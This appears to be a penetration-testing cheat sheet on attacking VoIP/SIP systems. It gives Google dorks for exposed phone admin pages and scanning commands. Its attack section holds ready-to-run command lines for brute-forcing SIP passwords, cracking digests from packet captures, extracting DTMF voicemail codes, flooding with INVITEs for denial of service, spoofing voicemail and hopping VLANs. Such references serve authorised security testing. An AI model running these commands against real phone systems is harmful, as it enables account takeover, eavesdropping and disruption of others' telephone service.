VoIP

Basic Messages

Request name	Description								RFC references
------------------------------------------------------------------------------------------------------
REGISTER	Register a SIP user.							RFC 3261
INVITE		Initiate a dialog for establishing a call. 				RFC 3261
ACK		Confirm that an entity has received.					RFC 3261
BYE		Signal termination of a dialog and end a call.				RFC 3261
CANCEL		Cancel any pending request.						RFC 3261
UPDATE		Modify the state of a session without changing the state of the dialog.	RFC 3311
REFER		Ask recipient to issue a request for the purpose of call transfer.	RFC 3515
PRACK		Provisional acknowledgement.						RFC 3262
SUBSCRIBE	Initiates a subscription for notification of events from a notifier.	RFC 6665
NOTIFY		Inform a subscriber of notifications of a new event.			RFC 6665
PUBLISH		Publish an event to a notification server.				RFC 3903
MESSAGE		Deliver a text message.	Used in instant messaging applications.		RFC 3428
INFO		Send mid-session information that does not modify the session state.	RFC 6086
OPTIONS		Query the capabilities of an endpoint					RFC 3261

Enumeration

Google Dork

# Grandstream phones
intitle:"Grandstream Device Configuration" Password
intitle:"Grandstream Device Configuration" (intext:password & intext:"Grandstream Device Configuration" & intext:"Grandstream Networks" | inurl:cgi-bin) -.com|org

# Cisco Callmanager
inurl:"ccmuser/logon.asp"
intitle:"Cisco CallManager User Options Log On" "Please enter your User ID and Password in the spaces provided below and click the Log On button"

# Cisco phones
inurl:"NetworkConfiguration" cisco

# Linksys phones
intitle:"Sipura SPA Configuration"

# Snom phones
intitle:"snom" intext:"Welcome to Your Phone!" inurl:line_login.htm

# Polycom SoundPoint IP & phones
intitle:"SoundPoint IP Configuration Utility - Registration"
"Welcome to Polycom Web Configuration Utility" "Login as" "Password"
intext: "Welcome to Polycom Web Configuration Utility" intitle:"Polycom - Configuration Utility" inurl:"coreConf.htm"
intitle:"Polycom Login" inurl:"/login.html"
intitle:"Polycom Login" -.com

# Elastix
intitle:"Elastix - Login page" intext:"Elastix is licensed under GPL"

# FreePBX
inurl:"maint/index.php?FreePBX" intitle: "FreePBX" intext:"FreePBX Admministration"

Network Enumeration

# Using Nmap
sudo nmap --script=sip-methods -sU -p 5060 10.10.0.0/24

# Using svmap
sudo apt install sipvicious

# Use --fp to fingerprint the services
svmap 10.10.0.0/24 -p 5060-5070 [--fp]

# Metasploit
auxiliary/scanner/sip/options_tcp normal  No     SIP Endpoint Scanner (TCP)
auxiliary/scanner/sip/options     normal  No     SIP Endpoint Scanner (UDP)

# sippts
sippts scan -i 10.10.0.0/24 -p all -r 5060-5080 -th 200 -ua Cisco [-m REGISTER]

Methods Enumeration

# sippts method enumration
sippts enumerate -i 10.10.0.10

VoIP Attacks

Password Brute Force (Online)

# Install sipvicious
sudo apt install sipvicious

# Crack known username
svcrack -u100 -d dictionary.txt udp://10.0.0.1:5080 

# Check username in extensions
svcrack -u100 -r1-9999 -z4 10.0.0.1 

# SIPPTS rcrack
sippts rcrack -i 10.10.0.10 -e 100,101,103-105 -w wordlist/rockyou.txt

VoIP Sniffing

Brute Force Credentials - Offline

# Install sipcrack
apt-get install sipcrack

# Extract digest authentication from a pcap file and bruteforce
sipdump -p net-capture.pcap sip-creds.txt
sipcrack sip-creds.txt -w dict.txt

# Extract digest information
sippts dump -f capture.pcap -o data.txt

# Crack digest information
sippts dcrack -f data.txt -w wordlist/rockyou.txt

# Extract data of SIP protocol from a PCAP file
sippts tshark -f capture.pcap [-filter auth]

DTMF Codes

Not only SIP credentials can be found in the network traffic, it's also possible to find DTMF codes which are used for example to access the voicemail. It's possible to send these codes in INFO SIP messages, in audio or inside RTP packets. If the codes are inside RTP packets, you could cut that part of the conversation and use the tool multimo to extract them:

multimon -a DTMF -t wac pin.wav

Password Spraying

# Metasploit
use auxiliary/voip/viproy_sip_brutef

Denail of Service

# Install inviteflood
sudo apt install inviteflood

# Run
inviteflood eth0 101 192.168.106.129 192.168.106.129 10000000

Voicemail Spoofing

Voicemail spoofing is possible due to unencrypted communications allowing us to manipulate the parameters in the INVITE request to impersonate anyone we like.

inviteflood eth0 102 192.168.106.129 192.168.106.129 1 -a "test"

VLAN Hopping

In a properly configured environment VoIP traffic is linked to a designated VLAN known as the Voice VLAN. Ideally, this VLAN should be completely segregated from the office network (DATA VLAN). This will prevent an attacker from intercepting VoIP traffic using a sniffing tool. VLAN hopping is the ability to jump from the VoIP network to the office network.

VoipHopper has a feature called Assessment Mode that is especially useful if we don’t know if we are dealing with well-known IP phones such as Cisco, AVAYA, etc.

# Install voiphopper
sudo apt install voiphopper

# Setup 802.1q in assessment VM
sudo modprobe 8021q

# VLAN hopping using assessment mode
voiphopper -i eth0 -z

# Hopping with known VLAN ID
voiphopper -i eth0 -v 30

If successful, we should see a new VLAN added to the interface we specified (eth0 in our example).

REFERENCES

PreviousDNSNextNetwork Pentesting

Last updated